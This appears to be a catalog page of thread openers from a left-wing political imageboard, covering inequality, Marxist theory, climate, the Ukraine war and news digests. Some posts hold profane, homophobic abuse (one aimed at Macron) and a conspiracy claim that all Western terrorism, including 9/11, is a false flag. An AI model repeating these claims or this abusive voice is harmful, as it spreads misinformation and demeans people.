R: 11 / I: 0

How do you guys deal with privilege and inequality when you see it in person

Recently I had to drop off a bunch of equipment after delivering and hauling shit around for like 10 hours before I landed in some far off town. At first I thought the people there were random villagers, but it turns out all of them (including the children) were wealthy landlords that are contributing to my country’s god awful issues with urban sprawl and housing issues. This is far from the first time I’ve seen this blatant disrespect for merit upfront (I’m sure you guys deal with it all the time), but going there with my hands fucking dirty, knowing I can’t do shit beyond fuck up my body and mind more in hopes that something will improve, knowing that more shits is gonna be taken away from me due to inflation and more taxes, and then seeing this shit just fucking hurt worse than it normally does. How the hell do you guys much less other people in countries where this inequality is so much more obvious and worse stomach this obnoxious shit?
R: 6 / I: 3

The political damage brought by poor public education

What does the word ‘politics’ (in most forms of English, it means “the activities managing the decisions made by groups of people”) mean in your language? Many adults can’t answer that question; many more can’t even write a complete sentence in their own language. I’m bringing up this problem, because I want you to understand why people around the world seemingly all fail to understand politics while seemingly all having the same views on it.

I believe that the lack of functional literacy skills present in many adults today combined with the similarities in societal norms and practices present in urbanized/urbanizing countries creates an effect where most people have the same ideas of politics. This effect cripples many people’s ability to understand just how vast the principles, laws, political theories, ideologies, legacies, and physical resources are available in the contemporary era, and what that can do to influence how their countries develop overtime.

How many times have you heard of someone in a North Atlantic or Central Asian country think of politics as either being on a linear spectrum or existing as exclusively in Islamic and non Islamic types? How many times have you seen reactionaries in public display their passion for politics and change, but fail to actually come up with any new ideas that weren’t already tried, tested, and abondoned decades or centuries ago? These phenomena are numerous in their examples, and they’re mind numbing, but they aren't unavoidable.

I believe that addressing the global public’s failures in providing a guaranteed knowledge base for everyone to have and be able to apply functional literacy, geography, and basic philosophy—that exists in types relative to the language being taught in each country—to adults (because they’re the majority and have the highest capacity to change the world) would bring an end to reactionary thought, and finally produce the changes necessary to prevent crises from happening cyclically. Additionally, I believe that the rise in global urbanization and the decline in barriers of entry to politics for a growing portion of humanity can facilitate the acceleration of such beneficial changes.
R: 2 / I: 0
wow hes just like jesus! they sacrificed him to the god of democracy. wow. just like jesus who was betrayed by jesus he's been betrayed by satanala who was vying for power. he's a martyr who gave up everything he had for the good of us all and to forgive our sins
R: 18 / I: 0

How to break free from this?

I know it. I know. It had already been discussed before. But hold up, just a darn minute. You're spamming the thread with nonsense, etc., but I really want to know what's the ultimate answer to the trolley problems. Please, enlighten me. Is it really just like the picrel? We can actually stop the lever without any risk at all?
R: 93 / I: 17
Is there a reason anarchists are more tolerant of maoists, especially as of late compared to other marxist-leninist lineages? I see this a lot more out of anarchists were they shit talk marxism leninism in general less and less especially maoism in particularly.
R: 84 / I: 25

OQ: Orc Question

I know /leftypol/ has historically disdained and liberal identity politics in general, but is there an actual materialist explanation of why men who embody (or more likely, want to embody) hypermasculinity and masculine-coded hobbies like weightlifting, MMA, motorcycles, etc. end up on the political right?
R: 331 / I: 64
What is the marxist explanation, that western countries are mass importing immigrants, but not countries like China and Russia? Shouldn't a socialist state like China actually import the world proletariat into their country?
R: 11 / I: 1

Its Macr'Over

Imagine being such a fucking dickless CUCK that when your liberal centrist coalition gets publically ass raped by the Fascist Right you justified surpressing the left for decades to keep out of power you decide to bend over for a second fucking helping, to give them complete control of the nation even faster then they otherwise would get it.
Like God DAMN Macron is a fucking BITCH.
Fucking absolute gay cock sucker for the far right he spent his entire career defining himself in opposition to:
R: 38 / I: 7

Be more gentle and patient when educating your fellow working class

Be more gentle and patient when educating your working class comrades

Ludwig Wittgenstein (whether you like him or not is besides the point) was a philosopher who talked about something called "language-games." He meant this in a similar way to different types of games we play, like board games, sports, or war games.

His idea was that words and sentences get their meaning from how we use them and the context in which we use them. For example, the word "water" can be used in different ways and have different meanings depending on the situation. It could be a request for someone to get you water, a warning that the water is poisoned, or even a secret code.

So, according to Wittgenstein, language is like a game where the rules are made up of how we use words and sentences, and the meaning comes from playing the game and following those rules.

People often get confused and frustrated when they talk about different things but use the same words. This is like playing a game with someone, but you each think you're playing a different game.

Imagine you and your friend are playing a game of cards. You think you're playing a game where the goal is to get the highest number, but your friend thinks it's a game where you want the lowest number. You both keep playing and arguing about who's winning, but you're never going to agree because you're playing by different rules.

This happens a lot in conversations and arguments. We use the same words but mean different things, or we think we're talking about the same idea but we're actually not. This can lead to unproductive arguments where no one understands each other and everyone gets frustrated.

The key to avoiding this is to make sure we understand each other before we start arguing or discussing something in depth. We need to clarify what we mean by certain words and ideas, and be open to learning that someone else might use those words differently. That way, we're all playing by the same rules and can have a more meaningful conversation.

Even though some things (like Marxism) might seem "simple" to those who know a lot about them, it can be very hard for newcomers to understand because they need to learn a whole new way of talking and thinking.

Imagine you want to learn how to play a new video game. If you've never played a video game before, you'd need to learn what all the buttons do, what the different terms mean (like "health," "inventory," or "quest"), and how to move your character. It might seem simple to someone who plays a lot of video games, but to a newcomer, it's a whole new world with its own rules and language.

The same is true for many subjects, like science, math, or philosophy. There are lots of new words and ideas to learn, and sometimes you even have to unlearn things you thought were true but aren't in this new subject. This takes time and effort, and it can be frustrating when people who already know the subject make it sound easy.

It's important for those who are already educated in a subject (like Marxism) to remember this and try to explain things in a way that newcomers can understand. They should also be patient and not under any circumstances make comrades feel bad for not knowing something yet. Learning something new is a journey, and everyone starts at the beginning.

People also often learn things in different orders, and just because someone learned something early on doesn't mean everyone will find it easy at that age.

Imagine two friends, Alice and Bob. Alice learned to ride a bike when she was 5 years old, and she thinks it's something most kids can do at that age. But Bob didn't learn until he was 10, because he was busy learning how to play the piano and studying a lot of math. For Bob, riding a bike at 10 years old was a big achievement, even though Alice might think it's easy, and therefore something Bob should have done years ago.

This happens with lots of different skills and subjects. Some people might pick up a new language very quickly as a child, but struggle with learning it as an adult. Others might not show an interest in history until they're older, even though they might have been great at math as a kid. Everyone has their own path of learning, and unique skill sets, and we shouldn't compare ourselves or others to a set idea of when we "should" learn something.

It's important to remember that learning is a lifelong journey, and we all have different starting points and different things we find easy or hard.

If you see a comrade struggling with concepts, be patient with them. If they become argumentative and arrogant, keep in mind that you might both be playing different language games. Try to detangle the misunderstanding rather than escalating into hostility and 1-upping each other with impatience and arrogance. It's good to be confident about your knowledge, but not to the point of arrogance.

These skills are especially relevant in face-to-face organizing contexts.
R: 170 / I: 25
Why are most people scared of communism when It would benefict everybody but the 0.1% of mankind? Are we doing something wrong?
<inb4 burgeois propaganda
Lazy answer
R: 117 / I: 24

out-BREED the LEFT

right wingers often claim that they are going to "out breed" the left.
>Charlie Kirk: Celebrating all the moms at our Young Women’s Leadership Summit this weekend. We’re going to win either now or later, when we outbreed the left!
<Chaya Raichik: I come from a family of 8. I plan to have a lot of kids. We’re going to outbreed the Left. Then we’re gonna homeschool or send our kids to private school so they can’t be groomed into becoming activists for leftist causes.
>Michael Knowles: there are two ways to beat the left: you can outargue them or you can outbreed them.
So leftypol will this work? Can the right simply OUTBREED the left and save capitalism forever and ever?
R: 15 / I: 2
Redpill me on these mates. Why their crews are like 90% crackers? Why they work so uncritically with Israel in the Mediterranean?
R: 16 / I: 2

Confucius-Hegel Traditionalist Thought

Why do Rightoids hate Confucianism but worship Hegel when their philosophies are the exact same in practice?
> The state must enforce a strict moral code or else society will collapse
> True freedom and happiness is achieved through serving society with an ethical lifestyle.
> The human spirit is developed through strict adherence to social virtues
> The world is connected as one greater spiritual existence therefore happiness is achieved through social harmony
> Traditional family values are the foundation of society
> Moral education must be enforced on the people to develop a functioning of mutual respect
> Passive Dialectical Rectification of traditions is the only way to advance society

Is it really just Orientalism or is something greater at play here?
R: 460 / I: 126

/Climate/ #3 Off the charts edition

This thread is dedicated to our accomplishment of having broken the upper limit of sea surface temperature and the lower limit of antarctic sea ice amount charts this summer, hence ushering our species firmly into the capitalocene. Good job guys! Welcome to the future.

Here's an article about that:

As for the news, there is a drought blocking shipping at the Panama canal, bad wildfires in North America and Greece, persistent heatwaves in eastern Europe and northern Africa, and floods in central and eastern China.

Here's the latest report from the IPCC
<AR6 Synthesis Report Climate Change 2023

The website of NASA about climate is great for getting data and visualizing climate change

Last thread: >>1332129
R: 38 / I: 3


Because Palestine is too arabic/ethnocrat. I mean that what happening with the jews after the liberation of Palestine. They just got kicked out or what?
R: 61 / I: 12

Gorby vs Deng

Deng did market reforms in China in the 70s and China continues to be ruled by marxist leninists today despite arguably creating a new bourgeoisie and high inequality.

Gorby tried to do perestroika and glastnost in the USSR 1985, and a mere 6 years later it had literally destroyed the whole country.

Why did one reform fail but the other succeed?
R: 14 / I: 1

Humanity is fine, earth is fine, depopulationism will be a forgotten part of the holocene

For all the scare depopulationists have been pushing, many of them fail to realize just how fast both governments and their citizens are adjusting to this changing world. Pronatalist programs seen worldwide, Africa going through its population boom, and governments making the economic reforms necessary to reduce inflation and promote financial security. These things at most are doing much to allow people the security they need to have kids and a stable future, and at least they are preventing the legitimate realities of a dying humanity from ever forming.
If that doesn’t convince you that the global population is genuinely fine, than I can tell you this. There are more governments than ever that will openly pay you to have kids, and there is more food than ever being produced to sustain all those children. Renewable energy has its highest share over the humanity’s energy consumption than at any point in history, and Africans right now are pushing for sustainable power development and nuclear solutions to their energy problems. Most countries (Japan, Jamaica, post soviet states, etc) that are experiencing population decline are seeing a reversal of the trend, which signifies that their populations are stabilizing and growing past a set point rather than simply declining in free fall. Finally, global inflation is declining not growing, which provides the generations of today a chance to start a family some time in the future even if that that future could be years or decades away from when they thought they’d get a chance.
Obviously, things are not entirely fine for people today to simply just start having kids right away. However, to say that humanity’s overall fertility rate will suddenly stagnate and decline rapidly is unrealistic, because of how much were changing as a global society in response to our shared problems.
R: 21 / I: 7

Euskadi Ta Askatasuna

what are leftypols thoughts on the Euskadi Ta Askatasuna and Basque country seperatism as a whole?
the basque people obviously form a completely separate identity from both spain and france, and a lot of the separatist movements in basque are pretty far left
R: 39 / I: 7
Was Oppenheimer evil? And is it fundamentally evil to create weapons of mass destruction (or weapons in general), considering the likelyhood that it's going to be used big evil governments on civillians?
R: 147 / I: 20

Is this a psyop?

>How will we get people to understand the urgency of climate change and the need to take drastic action to lower carbon emissions?
>I know, let's vandalize a World Heritage Site and potentially cause permanent damage
How the fuck is this supposed to make people take climate change seriously? I was ambivalent towards attacks on art pieces because maybe the idea is that rich and powerful people frequent those galleries, but what the fuck is vandalizing Stonehenge supposed to achieve other that causing animosity towards the climate movement? This is feeling more and more like a falseflag and psyop meant to discredit the climate movement and make them like idiot fanatics.
R: 7 / I: 1

wikipedia is trash

And should fucking die.
First of all it does nothing besides creating midwit retards with fragmentary knowledge about various topics. As we all know fragmentary knowledge is worse than knowing nothing at all.
Second, why use wikishit when you can use 1 out of millions AI chat-GPT like models? And actually read books instead of that garbage?

You know what's the worst part of the wikishit? Plot summary of various films, books and articles. People read those spoilers instead of the actual thing.
R: 20 / I: 2

1991 Soviet coup

Why did the 1991 Soviet coup fail? They were sloppy and then they just kinda gave up. What were they thinking? They only furthered the political crisis they were supposedly trying to fix.
R: 243 / I: 111

Glowiepedia thread

post instances of Wikipedia glowing, that is WP displaying blatant US/NATO propaganda or disinformation as facts
discuss ways of making WP glow less, including sharing sources that counter the glow. meta studies by reliable institutions are best
what to do if you discover radioactive material on WP:
>do NOT edit without logging in. otherwise your IP will be displayed. IP edits are viewed with more suspicion by editors. VPN or Tor IPs even more so
>DO register an account
>do NOT register more than one account per IP. sockpuppetry is not difficult to detect
>DO edit more articles than just those that glow. this helps build good reputation
>DO complain loudly on Talk pages. some articles are restricted, but Talk pages generally are not
>DO familiarize yourself with WP's bureaucracy. lib editors love referring to WP:OR, WP:SYNTH and similar to try and shut down discussion
WP editors are autistic, but not as autistic as the average poster here is. dedicated comrades can de-glow pages given sufficient numbers and patience
R: 342 / I: 49

Why are Abrahamic religions so spiritually successful?

Pretty much every people group exposed to Abrahamic faiths ends up incorporating elements from them. They are so successful that everyone, from pagan Nazis to "POC revival" faiths, essentially adopts basic elements of either Christianity or Islam and changes some names on top
R: 4 / I: 1

News 7/25/24

Turkish state continues to send soldiers to South Kurdistan
The Turkish state sent 100 more soldiers to the Dêrelok checkpoint in Duhok's Amêdîye district. From here, the soldiers were directed to other military points and bases. Additionally, a convoy consisting of 25-35 armored vehicles was sent first to Çelê district and then to Serzêrê.

Exclusive: Israel seeks changes to Gaza truce plan, complicating talks, sources say
Israeli negotiators "want a vetting mechanism for civilian populations returning to the north of Gaza, where they fear these populations could support” Hamas fighters who remain entrenched there, said the Western official. The Palestinian militant group rejected the new Israeli demand, according to the Palestinian and Egyptian sources

Emirati passports discovered in Sudan suggest UAE boots on the ground
According to the Guardian, a document sent to the UN Security Council and seen by the newspaper contains images allegedly found in Sudan and linked to the Rapid Support Forces (RSF), the paramilitary group that has been fighting the Sudanese Armed Forces (SAF) in the country since April 2023.

'Have mercy on us': Egyptians rage after fuel prices soar by up to 15%
The IMF deal dictates that Egypt lowers subsidies of petroleum products and food supplies amid, arguably, the toughest economic crisis in the modern history of the country, which has about one-third of its nearly 106 million population under the poverty line.

Walmart Canada raises hourly store wages for about 40,000 workers
Canada's inflation has been easing, with the annual inflation rate slowing more than expected in June, while its unemployment rate rose to a 29-month high, highlighting that people might be losing jobs as the labor market struggles to absorb a rapidly swelling population.

Brazilian rancher ordered to pay $50m for damage to Amazon
The case was brought by Brazil’s attorney general’s office, representing the Brazilian institute of environment and renewable natural resources (Ibama). It is the largest civil case brought for climate crimes in Brazil to date and the start of a legal push to repair and deter damage to the rainforest.

Opposition people on run amid police crackdown in Bangladesh
Most BNP leaders and activities were not staying in their homes at night to avoid arrest, while the party people alleged that police were also picking up family members of the party leaders if they were not found.

1 CPI (Maoist) Cadre Killed In Exchange Of Fire With Police Along Bhadradri Kothagudem-Mulugu Interdistrict Border
A cadre of the CPI (Maoist) was killed in an exchange of fire between a squad of 10 Maoists and security personnel in the Damarathogu-Alligudem forest area along the Bhadradri Kothagudem-Mulugu inter-district border in Telangana state on Thursday morning, a police official announced to the press today.

Thames Water breaches licence as part of its debt downgraded to junk
The regulator Ofwat could now fine Thames, the country’s largest water monopoly, up to 10% of its annual turnover, equating to hundreds of millions of pounds. However, since the company is already teetering close to temporary renationalisation, Ofwat is likely to hold off on any immediate large fines.

UN chief calls for action to stem ‘extreme heat epidemic’
The Copernicus Climate Change Service (C3S) said on Wednesday that the global average surface air temperature on July 22 rose to 17.15 degrees Celsius (62.9 degrees Fahrenheit) – or 0.06 degrees Celsius higher than the record set just a day earlier.
R: 12 / I: 1

Hollywood Propaganda

How can we effectively counter it? It’s a multibillion dollar industry that waxes poetic about spooks and the American military industrial complex. While they have films such as White House Down depicting right wing reactionaries as the terrorists, they also have Olympus Has Fallen depicting North Korea as the enemy too. For decades, they made out Soviets as the baddies and now do it with China and Russia.

Millions of people the world over fall for this idiotic, fascistic propaganda and it’s how we’re always stuck voting for democrat fascism or republican fascism. What can we do as communists to counter this?
R: 255 / I: 57


Way to fucking go. New country, and an anti imperialist confederacy at that.
R: 115 / I: 12 (sage)
Socialist here
What are you guys's stance on abortion ?
For my part, I think the question of if we should take away a potential newborn's right to life is simply a matter of human dignity, not whether you're conservative or not or whatsoever.
R: 6 / I: 1

News 7/24/24

Pro-Palestine protesters block foreign office with 'Genocide Made in Britain' banner
Demonstrators, four rows deep and holding a banner reading "Genocide Made in Britain", sealed off the office's main entrance. At least nine demonstrators were arrested, rotesters told Middle East Eye. The protest, organised by Workers for a Free Palestine, is one of the largest since Labour's victory in the general election, which saw the party lose five seats to pro-Palestinian independent candidates.

Houthis, Yemeni government reach financial 'de-escalation' deal: UN envoy
After striking their latest agreement, the warring parties will convene "meetings to discuss all economic and humanitarian issues based on the (UN) roadmap," said Grundberg's office. It stressed "the need for the parties to collaborate towards an economy that benefits all Yemenis and supports the implementation of a nationwide ceasefire and the resumption of an inclusive political process."

French left lawmakers slam Macron's decision not to appoint a new PM until after the Olympics
President Emmanuel Macron said on Tuesday he will maintain the caretaker government, led by his business-centred coalition, through the Olympics to avoid “disorder.” Mr Macron brushed aside a prime minister nomination by the left-wing New Popular Front (NPF), which won most seats at this month’s National Assembly elections.

Spain’s Supreme Court challenges constitutionality of amnesty for Catalan separatists
The Supreme Court said it believes that the amnesty violates the principle of equality before the law guaranteed in Spain’s constitution. It said, for example, the amnesty pardons violent acts committed for the cause of Catalan independence, such as stone-throwing at protests, while the same acts committed for other ends, political or not, are punishable.

Japanese Red Army Member Tsutomu Shirosaki Dies in Prison
Former Japanese Red Army member Tsutomu Shirosaki died while in state custody his involvement in the 1986 resistance attack on the Japanese Embassy in Jakarta. He was 76.

2,000 opposition people arrested, says BNP
‘We are not getting real information about the way the government suppressed and massacred the quota reform activists, shut down the internet and imposed a curfew. Hundreds of people were killed. The government is giving misleading information suppressing the actual information about the injured and the dead,’ Bangladesh Nationalist Party secretary general Mirza Fakhrul Islam Alamgir said at a press conference at the party chairperson’s office in Gulshan.

Over 100,000 Schools In Pakistan Remain Closed Due To The Heat
Planned power cuts, also known as load-shedding, happen frequently in Pakistan due to an ongoing power supply crisis The load-shedding varies from city to city, but in rural areas of Sindh they can last for more than 12 hours a day, leaving schools without fans.

Evo Morales, former president of Bolivia: ‘The government’s only plan is to eliminate my candidacy
In his interview with EL PAÍS, Morales, who governed from 2006 until 2019, affirms that the attempted coup that took place on June 26 was orchestrated by incumbent President Luis Arce. He also warns about the possibility of mass demonstrations in case he is impeded from presenting himself as a candidate in 2025

Kenyan president appoints opposition ministers to his Cabinet amid political unrest
President William Ruto on Wednesday appointed the minority leader in parliament and opposition leader Raila Odinga’s party chairman in his new Cabinet despite a split in the opposition coalition that saw other parties distance themselves from government talks.

‘They turn our farms into rape centres’: Russian mercenaries accused of abuse in Central African Republic
Sexual violence is growing in CAR, a country blighted by years of conflict and instability. Last year, Médecins Sans Frontières (MSF), reported that between 2018 and 2022 it took care of more than 19,500 survivors of sexual abuse across the central African nation. During the same period, the UN documented close to 15,000 other cases of sexual violence in the country.
R: 59 / I: 18

Can someone explain neo-nazis to me?

So I have this fascination with neo-nazis and I need to understand this.

Why the fuck are all neo-nazis like this meme?
It literally makes no sense whatsoever.
So neo-nazis are hardcore into holocaust denial I have yet to see a neo-nazis who does not shit and piss himself if someone mentions the holocaust.

So according to neo-nazis
<1) Hitlers Germany is the perfect government
<2) Hitler is the smartest man alive
<3)Hitler hated the jews
<4)Jews are responsible for everything evil in the world
And here comes the comedy part
<5)Hitler did not want to exterminate the jews
<6)The holocaust did not happen
<7)Hitler did not want to exterminate the jews
<8)Hitler build theaters and swimming pools in the concentration camps for the jews to relax.

Like WTF?! You think people who hate the jews so hard would simply accept that Hitler did the holocaust however no it is them pissing and shitting themselves and crying how the holocaust did not happen.

Why are they like this?
R: 36 / I: 6

Can you be a leftist if you believed in biological determinism?

Are you only a leftist because you don't believe in biological determinism?
is there a left that believes in it?
because I don't believe that the left should stop existing in case it's true. I believe that the left, at a philosophical level is about freedom from all limitations. freedom from oppression (even if it's "natural"),

my question is: would your rebellious spirit die in face of biological determinism? what is "leftism" to you? where is your limit?
R: 29 / I: 3
people often bring up that the nazis were dedicated to the holocaust to the point it hurt their own war effort and try to frame it as proof materialism is wrong, but that only proves that fascists aren't materialist, which, uh, proving fascists agree with you is kinda a Bad Thing. i guess they're saying it proves the holocaust happened because of nazi ideology and not material reasons, but it proves nothing of the sort. there WERE material motives behind the holocaust - the reason it ended up materially harming them is the nazis didn't know that themselves, like, there were absolutely material reasons for the holocaust - it eliminated part of the petit bourgeois, it served to promote racial hatred (which in turn encourages class collaboration), etc. - but that was all subconscious. consciously, all the nazis knew was they hated jews

hitler didn't wake up and think any of this. he himself also thought he was just doing this cause he hated jews. he was unaware even himself of the material reasons. so of course it ended up being to their material detriment, because it was carried out with idealistic motives, but obviously there were material reasons. hence why they initially tried to "only" expel the jews and seize their property. obviously it goes without saying that they had no qualms with outright killing them, so it wasn't for humanistic reasons. it was for material reasons

all it proves is the nazis weren't materialist. which nobody said otherwise. if everyone were materialist there'd be no need to critique idealism! this is such a poor argument against materialism but is bafflingly common. as if you need to tell a communist the holocaust was bad
R: 103 / I: 9


Hello, fellow humans, after reading, I was wondering what's practical steps to take against capitalism, it's cool and all to be a theorycel, but what about actual praxis on day to day life?
R: 99 / I: 16

Does there need to be vanguard party rule?

I used to believe in the vanguard party governing the dictatorship of the proletariat, but now I'm not so sure that it's necessary.
I can still see it being necessary as basically a school of communism that exists in proletarian organizations, but I'm less and less sure that it really needs to rule/lead the revolution the more I read and think about it.
What do you think?
R: 30 / I: 4
People who think capitalism is "human nature" often don't even understand what capitalism is. They think it is simply trade. They follow the barter myth of the early political economists like Adam Smith, who asserted that early cultures spent all day running back and further, looking for a double coincidence of wants, and then they project the present mode of production backwards through history, looking at the history of trade itself as the history of capitalism. What confuses them even further is the fact that capital predates capitalism, in the forms identified by Marx: Merchant's capital and usurer's capital. They think "how can capital predate capitalism?" and they assume this is some kind of Communist sleight of hand to make capitalism seem "unnatural" (which, again, capitalism is simply trade in their eyes, and trade is natural, therefore so is capitalism). It is as if one assumed that the history of mail was the history of writing, even though mail predates writing in precisely the same way that capital predates capitalism. Intermediaries carried symbolic communicative media such as symbols, signs, seals, from one person to another long before writing was properly writing.
R: 11 / I: 0 (sage)

wake up comrades

Can we all just acknowledge that 100% of terrorism cases in the West™ are false flags.
pic rel, an alleged muslim terrorist stabbing children in a park in Europe. Sloppy job mossad

let's be real. Every single case is entrapment like the whitmer alleged kidnapping https://theintercept.com/2023/12/18/fbi-nypd-catfishing-terrorism-sting-hamas/ or intelligence agencies
successfully committing terrorism like the Bataclan massacre and 9/11
R: 61 / I: 11

Saving The Soviet Experiment

You find the being Mikhail Gorbachev door on the thirteenth floor and you find yourself in Gorbachev's body in 1985. What do you do? How do you save the USSR?
R: 54 / I: 1
If historical materialism is a science then it should be able to provide at least one robust counter-factual supporting historical law of the form "if A happens then B must happen" with an allowable ceteris parabus clause like "if none of these exceptions are in place". Can it?
R: 14 / I: 3
Hey /leftypol/ poster, you, yes YOU, name 5 concrete features of class consciousness, and 5 factors which impede its development.

Currently reading Willhelm Reichs What is Class Consciousness, in which he describes a situation where a party official was asked this question at the meeting by one of the listeners. He answered "hunger", which prompted a counter response whether a hungry fascist storm trooper is class conscious. So I though it would be an interesting exercise for this site, I am curious as to what are your answers (you dont have to stick to 5 point format, just tell me in your own words what is class consciousness).
R: 125 / I: 48

Eritrea and Ethiopia

Another anon made a thread about the Eritrean War of Independence but it got anchored for being low-effort. I find the topic interesting so I'd like to make another if the mods will allow it.

How to make sense of the Eritrean War of Independence in the context of global politics at the time? You had Marxists and generally left-wing groups on both sides throughout the conflict (EPLF, TPLF, Derg), that had international backers on both sides of the cold war blocs. Cuba switching sides when the Derg took power. Syria and Iraq on one side with Israel and North Korea on the other. Basically what the fuck was going on? Seems very complicated.

Also would like to get some "now that the dust has settled" opinions on the 2020 Tigray war. At the time some anti-imperialist media outlets clearly supported the Ethiopian government against the TPLF, despite Abiy Ahmed being a rather west-friendly liberal sort of leader.
R: 4 / I: 2
Was reading "Leaving the Fold" and it was surprising how much I related as a former incel. My parents were pretty secular so it's surprising how well they matched up to Christian fundamentalists. Not sure what it means that the Blackpill is a kind of atheist Christianity. I blame a lot of it on /r/atheism to be honest.
R: 2 / I: 0

News 7/23/24

Hamas and Fatah sign unity deal in Beijing aimed at Gaza governance
He said its four main elements are the establishment of an interim national unity government, the formation of unified Palestinian leadership ahead of future elections, the free election of a new Palestinian National Council, and a general declaration of unity in the face of ongoing Israeli attacks.

'Tortured' Palestinian prisoner arrested on suspicion of killing Israeli jailer
Ibrahim Mansour, from the village of Bidu near Tulkarm, was arrested on July 10, two days after the body of prison service employee Yochai Avni was found, police said in joint statement with the Shin Bet security services.

Israeli parliament votes to label UN relief agency a terror organisation
The bill was approved in a first reading and will be returned to the foreign affairs and defence committee for further deliberation, the Knesset information service said.
The bill's sponsor, Yulia Malinovsky, was quoted as describing UNRWA as a "fifth column within Israel".

Suppliers to top essential oil brand left unpaid and afraid after abuse inquiry
Last year doTERRA, which sells essential oils and other wellness products to a mostly female customer base, launched an investigation into its frankincense supplier in Somaliland after reporting by the Fuller Project uncovered allegations of serious abuses, including sexual harassment and assault. Many women hired as frankincense sorters said they were routinely underpaid and faced harsh working conditions that had impacted their health.

Ugandan authorities arrest dozens in clampdown on anti-corruption protests
The protesters appear to have been inspired by events in neighbouring Kenya, where street action has recently forced President William Ruto to dismiss almost his entire cabinet amid widespread opposition to a now abandoned proposal to raise taxes.

Left MPs vow to stage a Commons rebellion over Sir Keir's refusal to scrap two-child benefit cap
SIR KEIR STARMER could be on course to receive a bloody nose over his refusal to scrap the cruel two-child benefit cap as left Labour MPs vow to stage a Commons rebellion tonight.

French left bloc New Popular Front agrees to propose Lucie Castets for prime minister
The New Popular Front (NFP) pick Lucie Castets is an economist and senior civil servant with a background in "fighting tax evasion and financial crime" as well as campaigning for public services, the alliance said in a statement.

Cop29 host Azerbaijan seeks $1bn from fossil fuel producers for climate fund
The fund will be capitalised with contributions from fossil-fuel countries and companies and will catalyse the private sector. Any developing country will be eligible [to receive money from] the fund.” But contributions to the fund will be voluntary and no mechanism is proposed to force the countries and companies most responsible for greenhouse gas emissions to pay into it.

Pakistan police raid former Prime Minister Imran Khan’s party office and arrest its spokesman
The arrests have drawn criticism from Gohar Ali Khan, the chairman of PTI, who said authorities also arrested some other workers of the party’s media wing, in a series of police raids in recent weeks.

Fishing treaty fails at WTO, prompting US, Chinese concern
The second phase tackling some of the toughest remaining issues had been drafted for approval at a WTO meeting this week but was blocked by India which criticised what it called the treaty's "significant shortcomings" while seeking deeper carve-outs for developing countries.
R: 500 / I: 126  

/ukr/ - Russia-Ukraine war general #180: Best Friends Edition

Remember!!: This war is all about the friend we've made along the way!

Previous thread: >>>/leftypol/1893738


Evidence of the influence and origin of neo-Nazi groups in Ukraine



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📺 Ukraine: The Avoidable War - Boy Boy

📺 America, Russia, and Ukraine's Far Right - Gravel Institute
https://www.youtube.com/watch?v=t0pyVJG7_6Q (Link TBA)

📺 Crimea vs Taiwan: Who Gets Self-Determination? - BadEmpanada

📺 The Nature of Putin's Russia and Its Causes (3-Part Series) - 1Dime

<Current Happenings

📺 The Grayzone: https://www.youtube.com/@thegrayzone7996
📺 DDGeopolitics: https://www.youtube.com/@DDGeopolitics
📺 Defense Politics Asia: https://www.youtube.com/@DefensePoliticsAsia
📺 The Duran: https://www.youtube.com/channel/UCdeMVChrumySxV9N1w0Au-w
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📺 Military Summary: https://www.youtube.com/@militarysummary


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R: 10 / I: 1 (sage)

Ancient Ireland = ancapistan

In Irish society, the courts and the law were largely libertarian, and operated within a purely stateless manner. This society persisted in this libertarian path for roughly a thousand years until its brutal conquest by England in the seventeenth century. And, in contrast to many similarly functioning primitive tribes (such as the Ibos in West Africa, and many European tribes), preconquest Ireland was not in any sense a "primitive" society: it was a highly complex society that was, for centuries, the most advanced, most scholarly, and most civilized in all of Western Europe. A leading authority on ancient Irish law wrote, "There was no legislature, no bailiffs, no police, no public enforcement of justice… There was no trace of State-administered justice."
R: 24 / I: 2 (sage)


Given everything in life revolves around physical & genetic survival, isn't it important that we actually start talking about the importance of achieving equality of outcomes that highly depend on genetic variance? The obvious ones I can think of is reproduction, because ugly physically unattractive men that can't change their appearance are literally treated like scum by society and all political factions.
>get lost incel
no. Given that reproduction is literally the only known way to Life to cheat death, being denied this is as worse as murder. I think I truly believe BIOLENINISM is the only solution to this.
R: 8 / I: 0

Olof Palme

Was he the most based social-democrat ever?
>steadfast in his non-alignment policy towards the superpowers
>supported numerous liberation movements following decolonization including, most controversially, economic and vocal support for a number of Third World governments.
>was the first Western head of government to visit Cuba after its revolution, giving a speech in Santiago praising contemporary Cuban revolutionaries
>frequently a critic of Soviet and American foreign policy, he expressed his resistance to imperialist ambitions and authoritarian regimes, including those of Francisco Franco of Spain, Augusto Pinochet of Chile, Leonid Brezhnev of the Soviet Union, António de Oliveira Salazar of Portugal, Gustáv Husák of Czechoslovakia, and most notably John Vorster and P. W. Botha of South Africa, denouncing apartheid as a "particularly gruesome system"
>his 1972 condemnation of American bombings in Hanoi, comparing the bombings to a number of historical crimes including the bombing of Guernica, the massacres of Oradour-sur-glane, Babi Yar, Katyn, Lidice and Sharpeville and the extermination of Jews and other groups at Treblinka, resulted in a temporary freeze in Sweden–United States relations
R: 3 / I: 1

News 7/22/24

Bangladesh's top court scales back quota system for civil service jobs – a partial victory for student protesters
Ruling on an appeal, the Supreme Court ordered that the veterans’ quota be cut to 5 per cent, with 93 per cent of jobs to be allocated on merit. The remaining 2 per cent will be set aside for members of ethnic minorities and transgender and disabled people.

India court suspends order to restaurants to display owners' names after anti-Muslim bias concerns
Police in the two states, both ruled by Prime Minister Narendra Modi's Hindu-nationalist party, gave oral orders in at least two districts requiring restaurants to put the names of their owners on display boards.

UAE hands 57 Bangladeshis long-term jail terms for protests
A court in the United Arab Emirates (UAE) has jailed 57 Bangladeshi nationals for staging protests in the Gulf country against their own government, according to the state media.

Israeli military confirms two more captives dead in Gaza
The Israeli military has confirmed that two more captives held in Gaza died months ago, adding that the possibility that they were killed by Israeli fire in southern Khan Younis is being investigated. Alex Dancyg, 75, and Yagev Buchstav, 35, who were taken by Hamas fighters during the October 7 attacks on Israel from their homes near the Gaza fence, were declared dead on Monday after a review by Israeli authorities including health experts.

HPG reports 4 aerial actions against the Turkish army in Zap
HPG Press Liaison Centre said: “Between 14-16 July, the bases of the occupying Turkish army in Şehîd Delîl Western Zap region were targeted by aircraft. The invaders in Sergelê Resistance Area were hit from the air 4 times. The number of invaders punished and injured in these actions could not be clarified exactly, but heavy casualties were inflicted on the positions and bases of the invaders."

Satirical Egyptian cartoonist arrested at home: press union
It is the second such arrest this month after journalist Khaled Mamdouh was apprehended at home on July 16 and kept in an unknown location before reappearing before state security prosecutors on Sunday, according to Egypt's press union.

